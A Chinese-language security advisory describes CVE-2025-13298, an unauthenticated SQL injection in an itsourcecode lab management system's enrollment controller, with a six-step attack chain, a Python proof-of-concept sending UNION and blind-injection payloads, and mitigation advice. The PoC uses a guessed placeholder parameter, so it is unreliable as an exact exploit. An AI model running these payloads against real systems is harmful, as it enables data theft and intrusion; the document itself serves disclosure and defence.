CVE-2025-13298: itsourcecode实验室管理系统controller.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13298

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Web-Based Internet Laboratory Management System 1.0

漏洞概述

CVE-2025-13298是itsourcecode公司开发的Web-Based Internet Laboratory Management System 1.0版本中的一个高危安全漏洞。该漏洞存在于/enrollment/controller.php文件中，由于对用户输入参数缺乏有效的过滤和验证，攻击者可以通过构造恶意的SQL语句实现SQL注入攻击。

该漏洞的CVSS评分为7.3，属于高危级别。攻击向量为网络攻击（AV:N），无需认证（PR:N）且无需用户交互（UI:N），这意味着任何能够访问目标系统的攻击者都可以尝试利用此漏洞。漏洞影响机密性（C:L）、完整性（I:L）和可用性（A:L）三个安全属性，均为低级别影响。

由于该漏洞的利用代码已公开，攻击者可以轻易获取并使用，这大大增加了漏洞被利用的风险。成功利用此漏洞可能导致数据库敏感信息泄露、数据篡改或删除，甚至可能通过数据库操作获取服务器权限。

该漏洞于2025年11月17日披露，目前已有公开的漏洞利用代码和概念验证（POC）可供攻击者使用。建议使用该系统的用户立即采取防护措施，避免遭受潜在攻击。

技术细节

漏洞位于itsourcecode Web-Based Internet Laboratory Management System 1.0的/enrollment/controller.php文件中。该文件在处理用户请求时，直接将用户可控的输入参数拼接到SQL查询语句中，未进行充分的输入过滤或使用参数化查询。

攻击者可以通过HTTP请求向/enrollment/controller.php发送带有恶意SQLpayload的参数。由于缺少输入验证和参数化查询，攻击者注入的SQL代码将被数据库服务器执行。常见的SQL注入利用方式包括：

1. 联合查询注入（UNION-based）：通过UNION语句获取其他表中的敏感数据，如用户凭证、管理员账号等。
2. 布尔盲注（Boolean-based blind）：根据页面返回内容的差异判断注入条件是否成立，逐步提取数据库信息。
3. 时间盲注（Time-based blind）：通过SLEEP()等时间函数，根据响应时间判断条件，逐步获取数据。
4. 报错注入（Error-based）：利用数据库错误信息返回敏感数据。

由于该漏洞无需认证即可利用，攻击者可以直接通过互联网对暴露的接口发起攻击。成功利用后，攻击者可能获取数据库中的用户信息、实验室数据、系统配置等敏感内容，甚至可能通过OUTFILE等函数写入恶意文件，实现远程代码执行。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的itsourcecode Web-Based Internet Laboratory Management System 1.0，并定位到/enrollment/controller.php端点

STEP 2

步骤2

漏洞探测：攻击者发送带有SQL注入payload的HTTP请求，验证目标是否存在SQL注入漏洞

STEP 3

步骤3

数据提取：利用UNION查询、布尔盲注或时间盲注等技术，逐步提取数据库中的敏感信息，如用户表、密码哈希等

STEP 4

步骤4

权限提升：通过获取的管理员凭证登录后台管理系统，获取更高权限

STEP 5

步骤5

持久化控制：可能通过数据库写入功能创建后门账户或写入恶意文件，实现长期持久化控制

STEP 6

步骤6

横向移动：利用获取的数据库信息或服务器权限，进一步攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13298 SQL Injection PoC
# Target: itsourcecode Web-Based Internet Laboratory Management System 1.0
# Vulnerable file: /enrollment/controller.php

def exploit_sqli(target_url):
    """
    SQL Injection exploit for CVE-2025-13298
    This PoC demonstrates extracting database version information
    """
    # Target endpoint
    endpoint = f"{target_url}/enrollment/controller.php"
    
    # SQL Injection payloads
    # Boolean-based blind injection to extract database version
    payloads = [
        "1' AND 1=1 -- -",  # True condition
        "1' AND 1=2 -- -",  # False condition
        "1' AND (SELECT COUNT(*) FROM users) > 0 -- -",  # Check if users table exists
    ]
    
    # Example: UNION-based injection to extract data
    union_payload = "1' UNION SELECT 1,2,3,version(),5,6,7,8,9,10 -- -"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting endpoint: {endpoint}")
    print("[*] Testing SQL Injection vulnerability...")
    
    try:
        # Test basic injection
        data = {
            'action': 'test',  # Example parameter - adjust based on actual vulnerable parameter
            'id': union_payload
        }
        
        response = requests.post(endpoint, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Target appears to be vulnerable to SQL Injection")
            print(f"[+] Response length: {len(response.text)} characters")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        
    print("\n[*] Note: This is a basic demonstration. Actual exploitation")
    print("[*] may require parameter and payload adjustment based on")
    print("[*] the specific application behavior.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sqli(target)

影响范围

itsourcecode Web-Based Internet Laboratory Management System 1.0

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，可采取以下临时缓解措施：1) 通过Web服务器配置（如Nginx、Apache）限制对/enrollment/controller.php的访问，仅允许受信任的IP地址访问；2) 部署Web应用防火墙规则，检测并拦截包含SQL注入特征字符的请求（如单引号、双破折号、UNION等关键词）；3) 暂时禁用或删除/enrollment/controller.php文件（如果该功能非必需）；4) 在应用层添加输入过滤逻辑，对所有参数进行严格的类型检查和特殊字符转义；5) 加强数据库监控，及时发现异常查询行为。建议尽快升级到厂商发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13298
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13298
3 Details https://www.cvedetails.com/cve/CVE-2025-13298/
4 VulDB https://vuldb.com/cve/CVE-2025-13298
5 Link https://github.com/f14g-orz/CVE/issues/4
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332638
8 Link https://vuldb.com/?id.332638
9 Link https://vuldb.com/?submit.691787